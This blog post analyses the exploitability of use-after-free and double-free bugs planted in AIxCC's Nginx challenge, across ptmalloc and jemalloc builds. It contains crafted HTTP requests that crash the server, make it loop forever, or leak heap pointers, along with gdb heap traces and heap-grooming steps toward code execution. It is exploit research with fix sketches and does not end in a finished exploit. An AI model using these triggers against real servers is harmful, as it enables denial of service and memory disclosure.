This blog post will analyse the exploitability of the temporal safety vulnerabilities in Nginx AIxCC.
AIxCC is a DARPA competition in which competitors use AI to find vulnerabilities in codebases. The targets are not 0-days, but vulnerabilities intentionally added to existing codebases. One of the semifinal targets was Nginx; the semifinals have already taken place.
In this blog post, I take a different focus: can these added vulnerabilities be exploited to achieve more than just crashes?
Hopefully, this writeup can serve as a useful exploration of a bit of Nginx internals for exploitation, as public exploits for memory corruption bugs in Nginx are virtually nonexistent. I will be analysing the bugs CPV9, CPV11 and CPV17, details of which can be found in the official AIxCC repo.
The system I am testing on is Ubuntu 24.04. I will consider two allocators: ptmalloc (the glibc default) and jemalloc. I'm testing jemalloc too because it's a high-performance allocator used in systems such as FreeBSD. I will also test with and without optimisations (`-O3` and `-O0`). For example:
./configure --with-mail --with-http_v2_module --with-cc-opt='-ggdb -O3' --error-log-path=/tmp/nginx/error.log --http-log-path=/tmp/nginx/access.log --pid-path=/tmp/nginx/nginx.pid
Change the `-O` flag in the configure command to `O3` or `O0` as required.
TL;DR
| | ptmalloc, O0 | ptmalloc, O3 | jemalloc, O0 | jemalloc, O3 |
|---|---|---|---|---|
| CPV9 | DoS | DoS | DoS | More severe DoS (CPU hogging) |
| CPV11 | DoS | DoS | Information leak | Information leak |
| CPV17 | DoS | DoS | RCE (chaining with CPV11 infoleak) | RCE (chaining with CPV11 infoleak) |
CPV9: Linked-list node UAF
Bug analysis
The heap UAF in CPV9, as triggered by the officially released vulnerable blob, results in a crash: the use-after-free ends in a NULL pointer dereference. Is it exploitable? Can we craft HTTP requests that don't result in a NULL dereference?
The bug lies in the deletion of blacklist entries in `ngx_black_list_remove`. A blacklist object consists of an `IP` pointer to a string object (`ngx_str_t`), plus `prev` and `next` pointers to neighbouring blacklist entries in a doubly-linked list.
typedef struct ngx_black_list_s {
    ngx_str_t           *IP;
    ngx_black_list_t    *next;
    ngx_black_list_t    *prev;
} ngx_black_list_t;
*The `ngx_black_list_s` structure.
In `ngx_black_list_remove`, the linked list is traversed until an entry with a matching `IP` is found. Now, consider the scenario where the list is empty, so `reader` is NULL: a NULL dereference happens in the for-loop initialiser `reader = reader->next`, which accesses the `next` field of a NULL pointer.
This is not all. Consider the scenario where the `remove_ip` argument of `ngx_black_list_remove` matches the head of the linked list. The condition of the first if-statement is satisfied, and the head node is cleaned up and freed in `ngx_destroy_black_list_link`. However, the `next` and `prev` fields of the deleted node are not cleared, and the head of the linked list is not updated. Subsequent uses of the blacklist therefore always start traversing from the head, which is now a dangling pointer to a node whose `IP` pointer is NULL. The dangling pointer can be used by subsequent `ngx_black_list_insert`, `ngx_black_list_remove` and `ngx_is_ip_banned` calls, and in all these cases the worker process crashes with a NULL pointer dereference because `IP` is NULL.
ngx_int_t
ngx_black_list_remove(ngx_black_list_t **black_list, u_char remove_ip[])
{
    ngx_black_list_t *reader;

    reader = *black_list;

    if (reader && !ngx_strcmp(remove_ip, reader->IP->data)) {
        ngx_destroy_black_list_link(reader);
        return NGX_OK;
    }

    for (reader = reader->next; reader && reader->next; reader = reader->next) {
        if (!ngx_strcmp(remove_ip, reader->IP->data)) {
            ngx_double_link_remove(reader);
            ngx_destroy_black_list_link(reader);
            return NGX_OK;
        }
    }

    return NGX_ERROR;
}
*The `ngx_black_list_remove` function.
#define ngx_destroy_black_list_link(x)              \
    ngx_memzero((x)->IP->data, (x)->IP->len);       \
    ngx_free((x)->IP->data);                        \
    (x)->IP->data = NULL;                           \
    ngx_memzero((x)->IP, sizeof(ngx_str_t));        \
    ngx_free((x)->IP);                              \
    (x)->IP = NULL;                                 \
    ngx_memzero((x), sizeof(ngx_black_list_t));     \
    ngx_free((x));                                  \
    (x) = NULL;
*The `ngx_destroy_black_list_link` macro that cleans up the node.
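For contrast, here is a minimal sketch (my own, not from the challenge sources) of what the head-removal case would have to do to avoid leaving a dangling head:

/* Hypothetical fix sketch: advance and unlink the head before destroying it. */
if (reader && !ngx_strcmp(remove_ip, reader->IP->data)) {
    *black_list = reader->next;            /* update the list head */
    if (*black_list) {
        (*black_list)->prev = NULL;        /* detach the new head */
    }
    ngx_destroy_black_list_link(reader);
    return NGX_OK;
}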
If we want to exploit this bug to achieve more than DoS, the first question is: can we craft HTTP requests that don’t result in a NULL dereference?
ptmalloc, without optimisations
After we free the blacklist head node, the list head still points to the freed node. Hmm, exploiting this under ptmalloc poses a problem: once the node is freed, `IP` holds the mangled pointer to the next tcache chunk, which is not a valid memory address. Invoking any of `ngx_is_ip_banned`, `ngx_black_list_remove` or `ngx_black_list_insert` would dereference `IP` and fault. Therefore, we need to find a way to write a valid address into `IP`, for example by overlapping another chunk allocated through `ngx_alloc` (and not `ngx_palloc`, which uses Nginx's pool allocator).
gef➤ p *(ngx_black_list_t *)0x000058aed058b300
$7 = {
  IP = 0x58ab5ab5b6ab,
  next = 0x4000cf8d198122bd,
  prev = 0x0
}
gef➤ x/10gx 0x000058aed058b300-0x10
0x58aed058b2f0: 0x0000000000000000 0x0000000000000021
0x58aed058b300: 0x000058ab5ab5b6ab 0x4000cf8d198122bd
0x58aed058b310: 0x0000000000000000 0x0000000000000021
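The garbage in `IP` is glibc's safe-linked tcache `next` pointer. Since glibc 2.32, ptmalloc stores the tcache/fastbin `next` pointer XORed with the storage address shifted right by 12 bits, and the second quadword of a freed tcache chunk holds the random reuse-detection key (the value overlapping our `next` field above). These are the mangling macros from glibc's malloc.c:

/* glibc >= 2.32 safe-linking (malloc.c): `pos` is the address where the
 * pointer is stored, `ptr` is the pointer being protected. A freed tcache
 * chunk therefore starts with a value that is not a dereferenceable
 * address, and that is exactly what lands in the overlapping IP field. */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)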
After playing around with CodeQL, I couldn't find an `ngx_alloc` call where (1) the size argument is in the interval (0, 0x18], (2) the content can be partially controlled by the request input, and (3) the allocated chunk is not freed again before being accessed through the dangling pointer. The third requirement is necessary for ptmalloc because the first 0x10 bytes of a freed chunk are used for inline metadata, which overlaps the `IP` and `next` fields of `ngx_black_list_t`; invoking any function that accesses the dangling pointer would crash if either `IP` or `next` points to invalid memory.
Well, we can overlap the dangling pointer with another blacklist node. The following snippet allocates memory for a new node. The first `ngx_alloc` holds the `IP->data` string and overlaps with the dangling pointer to the freed blacklist head. The issue is that `insert_ip` has already been validated as an IP address, so we can only write the digits 0-9 and dots. This is not enough to form a valid memory address (any 8-byte value built solely from the bytes 0x2e-0x39 lies far outside the canonical user-space range), so any subsequent request crashes when `ngx_is_ip_banned` touches the corrupted head node. Ugh.
u_char* new_str = (u_char*)ngx_alloc(size, log); // overlaps with freed [node A]
for (size_t i = 0; i < size; i++) {
    new_str[i] = insert_ip[i];
}

new_black_list = (ngx_black_list_t*)ngx_alloc(sizeof(ngx_black_list_t), log); // overlaps with [ A.str ]
new_black_list->IP = (ngx_str_t*)ngx_alloc(sizeof(ngx_str_t), log); // overlaps with [ A.str.data ]

new_black_list->IP->data = new_str;
new_black_list->IP->len = size;
new_black_list->next = NULL;
*Allocation of a blacklist node.
for (; reader; reader = reader->next) {
    if (!ngx_strcmp(connection->addr_text.data, reader->IP->data)) {
        ngx_close_connection(connection);
        return NGX_ERROR;
    }
}
*`ngx_is_ip_banned` core logic.
#define ngx_is_valid_ip_char(x) (('0' <= (x) && (x) <= '9') || (x) == '.')
*Restriction of the character set for `IP->data`.
I also thought about application-specific exploits: could we, for example, erase the blacklist to effectively “break” this feature? We can set `next` to zero, which effectively erases the blacklist. But the `IP` field would end up set to an invalid address… again, because we can only write digits and dots terminated with zeroes (no partial overwrite allowed).
Therefore, I think the highest impact of this bug is Denial of Service.
ptmalloc, with optimisations
With `O3`, the blacklist node is not memzeroed. However, the problem of `IP` pointing to invalid memory persists because of the inline tcache metadata. There are no suitable heap gadgets to write a valid memory address into the `IP` field of the UAF object.
Therefore, I think the highest impact of the bug is still Denial of Service.
jemalloc, without optimisations
We preload jemalloc like this:
LD_PRELOAD=/usr/local/lib/libjemalloc.so objs/nginx -c /home/roundofthree/challenge-004-nginx-source/cp9/test.conf
The mangling of the `IP` field doesn't occur with jemalloc, because jemalloc doesn't inline heap metadata; however, `IP` is zeroed if Nginx is compiled without optimisations.
And among the heap gadgets we have, I couldn't find a way to write a valid memory address into `IP`. Any reuse of the UAF blacklist node leads to a crash. Ugh.
Therefore, I think the highest impact of the bug is still Denial of Service.
jemalloc, with optimisations
With optimisations, `IP` is not zeroed, so the UAF node can be reused without crashing. `IP` points to freed memory too.
Using this request to trigger the UAF and reallocation:
GET / HTTP/1.1
Host: localhost:9999
User-Agent: curl/7.81.0
Accept: */*
Black-List: 111.111.111.111;222.222.222.222;333.333.333.333;
White-List: 111.111.111.111;
Black-List: 444.444.444.444;
Before removing the first node:
gef➤ p **(ngx_black_list_t **)0x783ffe04ab70
$3 = {
  IP = 0x783ffe01d060,
  next = 0x783ffe0340e0,
  prev = 0x0
}
gef➤ p *(ngx_str_t *)0x783ffe01d060
$4 = {
  len = 0x10,
  data = 0x783ffe01d050 "111.111.111.111"
}
After removing the first node and inserting a new one, the new node overlaps with the first node (unlike ptmalloc, jemalloc has size classes for both 0x10 and 0x20 bytes), but the `IP` and `IP->data` pointers are swapped due to malloc/free ordering. This leaves the first node in a valid state, so the process doesn't crash. But the `next` and `prev` pointers now form a cycle.
gef➤ p *(ngx_black_list_t *)0x0000783ffe0340c0
$19 = {
  IP = 0x783ffe01d050,
  next = 0x783ffe0340c0,
  prev = 0x783ffe0340c0
}
gef➤ p *(ngx_str_t *)0x783ffe01d050
$16 = {
  len = 0x10,
  data = 0x783ffe01d060 "444.444.444.444"
}
Inserting a new node now leads to an infinite traversal. Removing a node returns the application to the same state as before. We are limited here because we don't have enough heap gadgets of the same size class. If we free the object twice, the second free crashes the process because the `IP` object is memzeroed.
Although not RCE, corrupting a linked list to trigger an infinite traversal is arguably a more severe DoS attack than just crashing the process, because the infinite traversal hogs the worker process.
$ nc localhost 8080
GET / HTTP/1.1
Host: localhost:9999
User-Agent: curl/7.81.0
Accept: */*
Ctrl+C
[#0] 0x783ffe98afa0 → __strcmp_avx2()
[#1] 0x64fb3d0b5968 → ngx_is_ip_banned(cycle=<optimised out>, connection=0x783ffe08e720)
[#2] 0x64fb3d0dd987 → ngx_http_wait_request_handler(rev=0x783ffe0af600)
[#3] 0x64fb3d0cdd15 → ngx_epoll_process_events(cycle=0x783ffe04a8d0, timer=<optimised out>, flags=0x1)
[#4] 0x64fb3d0c39ca → ngx_process_events_and_timers(cycle=0x783ffe04a8d0)
[#5] 0x64fb3d0cbae0 → ngx_worker_process_cycle(cycle=0x783ffe04a8d0, data=0x0)
[#6] 0x64fb3d0ca05a → ngx_spawn_process(cycle=0x783ffe04a8d0, proc=0x64fb3d0cba50 <ngx_worker_process_cycle>, data=0x0, name=0x64fb3d1454da "worker process", respawn=0xfffffffffffffffd)
[#7] 0x64fb3d0cb428 → ngx_start_worker_processes(cycle=0x783ffe04a8d0, n=0x1, type=0xfffffffffffffffd)
[#8] 0x64fb3d0cc716 → ngx_master_process_cycle(cycle=0x783ffe04a8d0)
[#9] 0x64fb3d09dec2 → main(argc=<optimised out>, argv=<optimised out>)
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ c
Continuing.
*GDB showing the infinite traversal in `ngx_is_ip_banned`.
CPV11: UAF read
Bug analysis
CPV11 does not crash the Nginx process, and it prints the host specifications even without remote admin privileges, because the UAF buffer contains the host specifications. The object `cycle->host_specs` is allocated in `ngx_init_cycle`, and its fields `host_cpu`, `host_mem` and `host_os` are initialised immediately after:
// [...]
cycle->host_specs->host_cpu = ngx_alloc(sizeof(ngx_str_t), log);
if (cycle->host_specs->host_cpu == NULL) {
    ngx_destroy_pool(pool);
    return NULL;
}
cycle->host_specs->host_cpu->data = (u_char*)"Unknown CPU\n";

ngx_memzero(line, NGX_MAX_HOST_SPECS_LINE);
fp = fopen("/proc/cpuinfo", "r");
if (fp != NULL) {
    temp_char = NULL;
    while (fgets(line, sizeof(line), fp) != NULL) {
        if (ngx_strncmp(line, "model name", 10) == 0) {
            temp_char = strchr(line, ':');
            if (temp_char != NULL) {
                temp_char += 2;
                cycle->host_specs->host_cpu->data = ngx_alloc(sizeof(line), log);
                if (cycle->host_specs->host_cpu->data == NULL) {
                    break;
                }
                ngx_memzero(cycle->host_specs->host_cpu->data, sizeof(line));
                cycle->host_specs->host_cpu->len = \
                    ngx_sprintf(cycle->host_specs->host_cpu->data, "%s", temp_char) - \
                    cycle->host_specs->host_cpu->data;
                break;
            }
        }
    }
    fclose(fp);
}
// [...]
The issue is that, immediately afterwards, the code checks whether `remote_admin` is configured and, if not, frees `cycle->host_specs` while keeping the reference to the freed object.
ccf = (ngx_core_conf_t *) ngx_get_conf(cycle->conf_ctx, ngx_core_module);

if (!ccf->remote_admin) {
    ngx_free(cycle->host_specs);
}
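A sketch of a UAF-free variant (my own, not the challenge code) would clear the reference after freeing; later uses would then have to NULL-check (including `ngx_http_get_host_specs`) instead of silently reading freed memory:

if (!ccf->remote_admin) {
    ngx_free(cycle->host_specs);
    cycle->host_specs = NULL;   /* drop the dangling reference */
}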
A quick grep shows that `cycle->host_specs` is used in `ngx_http_get_host_specs` (the only other use is in `ngx_master_process_exit`, which tears down `cycle->host_specs`). The dangling pointer can be dereferenced in `ngx_http_get_host_specs` to print the host specifications even when `remote_admin` is not enabled.
static ngx_int_t ngx_http_get_host_specs(ngx_http_request_t *r,
    ngx_http_variable_value_t *v, uintptr_t data)
{
    u_char *temp;

    v->data = ngx_pnalloc(r->pool, NGX_MAX_HOST_SPECS_LINE * 3);
    if (v->data == NULL) {
        return NGX_HTTP_INTERNAL_SERVER_ERROR;
    }
    ngx_memzero(v->data, NGX_MAX_HOST_SPECS_LINE * 3);

    temp = v->data;
    v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_cpu->data); // NO CHERI crash CPV11 (UAF)
    v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_mem->data);
    v->data = ngx_sprintf(v->data, "%s", r->cycle->host_specs->host_os->data);

    v->len = v->data - temp;
    v->data = temp;

    return NGX_OK;
}
The vulnerable UAF object here is `ngx_host_specs_t`, which falls in the 0x20 size class (the object size is 0x18). We suffer from the same lack of heap gadgets for the 0x20 size class as in CPV9… The only gadget I know of is the blacklist node, which is the vulnerable object in CPV9.
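For reference, `ngx_host_specs_t` presumably looks something like this (field names and the 0x18 size are inferred from the gdb dumps below; the exact definition lives in the challenge sources):

typedef struct {
    ngx_str_t  *host_cpu;   /* +0x00 */
    ngx_str_t  *host_mem;   /* +0x08 */
    ngx_str_t  *host_os;    /* +0x10 */
} ngx_host_specs_t;         /* 0x18 bytes, served from the 0x20 size class */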
ptmalloc (with and without optimisations)
The freed `ngx_host_specs_t` object, as seen from the worker process, has its first two fields zeroed, while from the master process they are populated with heap metadata. This is because the object was freed in the master process, and the master process wrote the mangled tcache next pointer and the tcache key into the first two fields of the allocation.
gef➤ p *(ngx_host_specs_t *)0x601a05991f40
$3 = {
  host_cpu = 0x0,
  host_mem = 0x0,
  host_os = 0x601a05992040
}
*Worker process gdb view.
gef➤ p *(ngx_host_specs_t *)0x601a05991f40
$1 = {
  host_cpu = 0x601a05991,
  host_mem = 0xd213200cf2633c78,
  host_os = 0x601a05992040
}
*Master process gdb view.
Because the freed `ngx_host_specs_t` sits in the tcache of the master process, I can't overlap it with a blacklist node. Triggering the UAF read primitive in `ngx_http_get_host_specs` simply crashes the worker process (DoS) by dereferencing an invalid pointer.
jemalloc (with and without optimisations)
This is the freed host specs object.
gef➤ p *(ngx_host_specs_t*)0x73e067a340a0
$2 = {
  host_cpu = 0x73e067a1d020,
  host_mem = 0x73e067a1d030,
  host_os = 0x73e067a1d040
}
Then we make the first blacklist node overlap with the freed host specs object. `prev` is still the old `host_os` pointer, `IP` is a freshly allocated `ngx_str_t`, and to make `next` non-NULL we allocate at least one more blacklist node. `next` then points to a blacklist node, but it overlaps with `host_mem`, which is treated as an `ngx_str_t *`, so `host_mem->data` overlaps with `next->next`. We therefore allocate yet another blacklist node to fill in that pointer. When printing the host specs, the `%s` print of `host_mem->data` dumps the raw bytes of the third node, leaking its `IP` pointer, `0x73e067a1d0a0`, a recently allocated heap object.
gef➤ p *(ngx_black_list_t *)0x73e067a340a0
$7 = {
  IP = 0x73e067a1d060,
  next = 0x73e067a340c0,
  prev = 0x73e067a1d040
}
gef➤ p *(ngx_black_list_t *)0x73e067a340c0
$8 = {
  IP = 0x73e067a1d080,
  next = 0x73e067a340e0,
  prev = 0x73e067a340a0
}
gef➤ p *(ngx_black_list_t *)0x73e067a340e0
$9 = {
  IP = 0x73e067a1d0a0,
  next = 0x0,
  prev = 0x73e067a340c0
}
GET /host_specs HTTP/1.1
Host: localhost
Connection: Close
Black-List: 111.111.111.111;222.222.222.222;333.333.333.333;444.444.444.444;
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Mon, 17 Feb 2025 17:06:18 GMT
Content-Type: text/plain
Content-Length: 63
Connection: close
Host Specifications:
111.111.111.111�Сg�s"Ubuntu 24.04.1 LTS"
There are only read primitives for this UAF object… So I reckon the highest impact I can get is information disclosure (leaking a heap pointer).
CPV17: UAF to double free?
Bug analysis
Triggering the heap UAF in CPV17 logs an application error: the UAF object `s->connection` has its `write` event object passed to `ngx_mail_send` in `ngx_mail_session_internal_server_error`, and the fd corresponding to `s->connection->write` was already closed by the first free (`ngx_mail_close_connection`), causing a `send() failed (9: Bad file descriptor)` error.
2025/02/04 00:06:22 [alert] 21598#0: *2 send() failed (9: Bad file descriptor) while in auth state, client: 127.0.0.1, server: 0.0.0.0:8080
2025/02/04 00:06:22 [alert] 21598#0: *2 connection already closed while in auth state, client: 127.0.0.1, server: 0.0.0.0:8080
*Nginx log snippet after triggering CPV17 using the officially released trigger blob.
According to the official CPV information,
> This function attempts to access the freed connection structure, which leads to a crash via a UAF.
However, it doesn’t trigger a crash in jemalloc.
What is happening, then?
`ngx_mail_send` calls `ngx_mail_close_connection` because the fd is cleared.
void
ngx_mail_send(ngx_event_t *wev)
{
    ngx_int_t                 n;
    ngx_connection_t         *c;
    ngx_mail_session_t       *s;
    ngx_mail_core_srv_conf_t *cscf;

    c = wev->data;
    s = c->data;

    if (wev->timedout) {
        ngx_log_error(NGX_LOG_INFO, c->log, NGX_ETIMEDOUT, "client timed out");
        c->timedout = 1;
        ngx_mail_close_connection(c);
        return;
    }

    if (s->out.len == 0) {
        if (ngx_handle_write_event(c->write, 0) != NGX_OK) {
            ngx_mail_close_connection(c);
        }
        return;
    }

    n = c->send(c, s->out.data, s->out.len);

    // [...]

    if (n == NGX_ERROR) {
        ngx_mail_close_connection(c); // HERE
        return;
    }

    // [...]
Calling `ngx_mail_close_connection` twice on the same connection object means calling `ngx_close_connection` and `ngx_destroy_pool` twice. The double `ngx_close_connection` is harmless because it checks that `fd` is not -1. However, calling `ngx_destroy_pool` twice on the same pool object can corrupt the internal state of the memory allocator through double frees: in `ngx_destroy_pool`, the registered cleanup handlers are called, the large allocations associated with the pool are freed again, and the pool blocks themselves are freed again to the system allocator.
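For reference, this is (abridged, minus debug logging) what `ngx_destroy_pool` does in upstream Nginx; a second call on the same pool re-runs the cleanup handlers and re-frees both the large allocations and the pool blocks:

void
ngx_destroy_pool(ngx_pool_t *pool)
{
    ngx_pool_t          *p, *n;
    ngx_pool_large_t    *l;
    ngx_pool_cleanup_t  *c;

    for (c = pool->cleanup; c; c = c->next) {
        if (c->handler) {
            c->handler(c->data);        /* cleanup handlers run again */
        }
    }

    for (l = pool->large; l; l = l->next) {
        if (l->alloc) {
            ngx_free(l->alloc);         /* large allocations double-freed */
        }
    }

    for (p = pool, n = pool->d.next; /* void */; p = n, n = n->d.next) {
        ngx_free(p);                    /* pool blocks double-freed */

        if (n == NULL) {
            break;
        }
    }
}

And `ngx_mail_close_connection`, shown below, is where the doubled `ngx_destroy_pool` call originates.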
void
ngx_mail_close_connection(ngx_connection_t *c)
{
    ngx_pool_t  *pool;

    ngx_log_debug1(NGX_LOG_DEBUG_MAIL, c->log, 0,
                   "close mail connection: %d", c->fd);

#if (NGX_MAIL_SSL)
    if (c->ssl) {
        if (ngx_ssl_shutdown(c) == NGX_AGAIN) {
            c->ssl->handler = ngx_mail_close_connection;
            return;
        }
    }
#endif

#if (NGX_STAT_STUB)
    (void) ngx_atomic_fetch_add(ngx_stat_active, -1);
#endif

    c->destroyed = 1;

    pool = c->pool;

    ngx_close_connection(c);

    ngx_destroy_pool(pool); // double free
}
ptmalloc (with and without optimisations)
Why does triggering the bug immediately lead to a crash in ptmalloc?
In the second call to `ngx_mail_session_internal_server_error`, the mail session object `s` in the line `ngx_mail_send(s->connection->write);` points to a freed object, `0x5b33b60b0130`. Due to inline metadata, `s->connection` points to invalid memory corresponding to the inline tcache key. Therefore, with ptmalloc, triggering this bug leads to an immediate crash.
gef➤ p s
$14 = (ngx_mail_session_t *) 0x5b33b60b0130
gef➤ heap bins
────────────────────────────────────────────────────────────────────────────────── Tcachebins for thread 1 ──────────────────────────────────────────────────────────────────────────────────
Tcachebins[idx=15, size=0x110, count=4] ← Chunk(addr=0x5b33b60f6700, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← Chunk(addr=0x5b33b60b0020, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← Chunk(addr=0x5b33b60b02c0, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← Chunk(addr=0x5b33b60f6810, size=0x110, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
Tcachebins[idx=23, size=0x190, count=1] ← Chunk(addr=0x5b33b60b0130, size=0x190, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
Tcachebins[idx=28, size=0x1e0, count=1] ← Chunk(addr=0x5b33b60af2c0, size=0x1e0, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
Tcachebins[idx=63, size=0x410, count=2] ← Chunk(addr=0x5b33b60af520, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← Chunk(addr=0x5b33b60afb10, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
gef➤ p s->connection
$15 = (ngx_connection_t *) 0x540bb4cf3bebdbec
Highest impact: DoS.
jemalloc (with and without optimisations)
Because jemalloc doesn't have inline metadata, the worker process doesn't crash before `ngx_destroy_pool` is called twice on the same pool object. Thus, after triggering the bug, we have 4 double-freed allocations (jemalloc doesn't have any double-free protection):
- Double free of three 0x100-byte allocations (in the following case, `0x7caf42ac2200`, `0x7caf42ac2100` and `0x7caf42ac2000`), corresponding to the three pool blocks chained together. See the three allocations being returned twice:
gef➤ p malloc(0x100)
$3 = (void *) 0x7caf42ac2200
gef➤ p malloc(0x100)
$4 = (void *) 0x7caf42ac2100
gef➤ p malloc(0x100)
$5 = (void *) 0x7caf42ac2000
gef➤ p malloc(0x100)
$6 = (void *) 0x7caf42ac2300
gef➤ p malloc(0x100)
$7 = (void *) 0x7caf42ac2200
gef➤ p malloc(0x100)
$8 = (void *) 0x7caf42ac2100
gef➤ p malloc(0x100)
$9 = (void *) 0x7caf42ac2000
gef➤ p malloc(0x100)
$10 = (void *) 0x7caf42ac2300
gef➤ p malloc(0x100)
$11 = (void *) 0x7caf42ac2400
gef➤ p malloc(0x100)
$12 = (void *) 0x7caf42ac2500
- Double free of one 0x1000-byte allocation (in the following case, `0x70388d020000`), corresponding to the large pool block in the double-freed pool:
gef➤ p malloc(0x1000)
$1 = (void *) 0x70388d020000
gef➤ p malloc(0x1000)
$2 = (void *) 0x70388d020000
gef➤ p malloc(0x1000)
$3 = (void *) 0x70388d023000
gef➤ p malloc(0x1000)
$4 = (void *) 0x70388d024000
I tried to 1) trigger the vuln and 2) send a simple HTTP GET request. The result: the process crashes when trying to allocate from a corrupted pool. This is because the 0x1000 allocation is used both as the connection pool and as its own next pool block (observe that `d.next` points to itself). So items allocated from the second pool block corrupt items in the first pool block. In this case, `r->headers_in.headers` overlaps with the metadata of the first pool block, leaving `current` as an invalid address. This causes any subsequent pool allocation to crash…
gef➤ p *(ngx_pool_t*)0x70388d020000
$14 = {
  d = {
    last = 0x70388d020480 "P\254\004\2158p",
    end = 0x70388d021000 "\t",
    next = 0x70388d020000,
    failed = 0x0
  },
  max = 0x30f5a8,
  current = 0x4,
  chain = 0x70388d03500f,
  large = 0x9,
  cleanup = 0x70388d035015,
  log = 0x70388d01e060
}
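The self-referential `d.next` falls out of how pools grow. Abridged from the upstream Nginx source, `ngx_palloc_block` allocates each new block with the full pool size (here 0x1000, so the allocator hands back the double-freed chunk, i.e. the pool itself) and links it at the end of the block chain, making the pool point to itself:

static void *
ngx_palloc_block(ngx_pool_t *pool, size_t size)
{
    u_char      *m;
    size_t       psize;
    ngx_pool_t  *p, *new;

    psize = (size_t) (pool->d.end - (u_char *) pool);        /* full pool size, 0x1000 here */

    m = ngx_memalign(NGX_POOL_ALIGNMENT, psize, pool->log);  /* returns the stale chunk */
    if (m == NULL) {
        return NULL;
    }

    new = (ngx_pool_t *) m;

    new->d.end = m + psize;
    new->d.next = NULL;
    new->d.failed = 0;

    m += sizeof(ngx_pool_data_t);
    m = ngx_align_ptr(m, NGX_ALIGNMENT);
    new->d.last = m + size;

    for (p = pool->current; p->d.next; p = p->d.next) {
        if (p->d.failed++ > 4) {
            pool->current = p->d.next;
        }
    }

    p->d.next = new;        /* with the overlap: pool->d.next = pool */

    return (void *) m;
}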
What exactly corrupted the pool metadata? And how can we avoid corrupting it? In `ngx_http_process_request_line`, a list is allocated from the double-freed pool with size `20 * sizeof(ngx_table_elt_t) = 0x460`, which triggers the second pool block allocation.
if (ngx_list_init(&r->headers_in.headers, r->pool, 20,
                  sizeof(ngx_table_elt_t))
    != NGX_OK)
{
    ngx_http_close_request(r, NGX_HTTP_INTERNAL_SERVER_ERROR);
    break;
}
In `ngx_http_process_request_headers`, for every header line that is parsed successfully, `ngx_list_push` allocates memory from the second pool block, overwriting the overlapped pool block metadata.
/* a header line has been parsed successfully */

h = ngx_list_push(&r->headers_in.headers);
if (h == NULL) {
    ngx_http_close_request(r, NGX_HTTP_INTERNAL_SERVER_ERROR);
    break;
}

h->hash = r->header_hash;

h->key.len = r->header_name_end - r->header_name_start; // overlaps with `current`
h->key.data = r->header_name_start;
h->key.data[h->key.len] = '\0';

h->value.len = r->header_end - r->header_start;
h->value.data = r->header_start;
h->value.data[h->value.len] = '\0';

h->lowcase_key = ngx_pnalloc(r->pool, h->key.len); // crash due to the corruption above
How can we avoid corrupting the pool block metadata? The moment a header line is processed successfully, the process crashes. So we must either avoid processing a valid header, or hijack the control flow before any header is processed. I made many attempts, but I'll highlight two approaches.
Attempt 1: Using the logger
I thought I could write partially controlled content at `pool+0x20` by abusing the fact that the log handler allocates its buffer from the pool:
[#0] 0x5a4dfc6ade3e → ngx_http_log_body_bytes_sent(r=0x711c2b220050, buf=0x711c2b220452 "", op=0x711c2b24df58)
[#1] 0x5a4dfc6acc32 → ngx_http_log_handler(r=0x711c2b220050)
[#2] 0x5a4dfc6a7e1a → ngx_http_log_request(r=0x711c2b220050)
[#3] 0x5a4dfc6a7c67 → ngx_http_free_request(r=0x711c2b220050, rc=0x0)
[#4] 0x5a4dfc6a7b24 → ngx_http_close_request(r=0x711c2b220050, rc=0x0)
[#5] 0x5a4dfc6a765e → ngx_http_lingering_close_handler(rev=0x711c2b2a0e80)
[#6] 0x5a4dfc681068 → ngx_event_expire_timers()
[#7] 0x5a4dfc67ec08 → ngx_process_events_and_timers(cycle=0x711c2b24a4d0)
[#8] 0x5a4dfc68cfc7 → ngx_worker_process_cycle(cycle=0x711c2b24a4d0, data=0x0)
[#9] 0x5a4dfc689a91 → ngx_spawn_process(cycle=0x711c2b24a4d0, proc=0x5a4dfc68cf0b <ngx_worker_process_cycle>, data=0x0, name=0x5a4dfc74d887 "worker process", respawn=0x0)
gef➤ tele 0x711c2b220000
0x0000711c2b220000│+0x0000: 0x0000711c2b220480 → 0x0000711c2b24a4d0 → 0x0000711c2b24b780 → 0x0000711c2b24c370 → 0x0000000000000001
0x0000711c2b220008│+0x0008: 0x0000711c2b221000 → 0x0000000000000009 ("\t"?)
0x0000711c2b220010│+0x0010: 0x0000711c2b220000 → 0x0000711c2b220480 → 0x0000711c2b24a4d0 → 0x0000711c2b24b780 → 0x0000711c2b24c370 → 0x0000000000000001
0x0000711c2b220018│+0x0018: 0x0000000000000000
0x0000711c2b220020│+0x0020: "127.0.0.1 - - [19/Feb/2025:19:18:21 +0000] "aGET /[...]"
0x0000711c2b220028│+0x0028: "1 - - [19/Feb/2025:19:18:21 +0000] "aGET /very/lon[...]"
0x0000711c2b220030│+0x0030: "9/Feb/2025:19:18:21 +0000] "aGET /very/long/path/t[...]"
0x0000711c2b220038│+0x0038: "25:19:18:21 +0000] "aGET /very/long/path/that/keep[...]"
0x0000711c2b220040│+0x0040: ":21 +0000] "aGET /very/long/path/that/keeps/going/[...]"
0x0000711c2b220048│+0x0048: "0] "aGET /very/long/path/that/keeps/going/on/and/o[...]"
But there's an issue: we can't write NULL bytes or non-printable characters, because the logger sanitises them. This is what happens:
gef➤ tele r->pool
0x00007b7aa7e20000│+0x0000: 0x00007b7aa7e2009d → 0x7555de17f0000061 ("a"?)
0x00007b7aa7e20008│+0x0008: 0x00007b7aa7e21000 → 0x0000000000000009 ("\t"?)
